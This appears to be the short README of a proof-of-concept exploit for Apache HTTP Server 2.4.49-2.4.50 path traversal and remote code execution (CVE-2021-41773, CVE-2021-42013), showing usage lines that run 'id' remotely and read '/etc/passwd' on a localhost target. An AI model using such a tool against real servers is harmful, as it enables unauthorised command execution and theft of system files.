
Apache HTTP-Server 2.4.49-2.4.50 Path Traversal & Remote Code Execution PoC (CVE-2021-41773 & CVE-2021-42013)
Dies ist ein PoC-Skript für CVE-2021-41773 & CVE-2021-42013
python3 exploit.py <rhost> <rport> <option> <cmd> | <file-absolute-path>
python3 exploit.py 127.0.0.1 8080 rce 'id'

python3 exploit.py 127.0.0.1 8080 file '/etc/passwd'
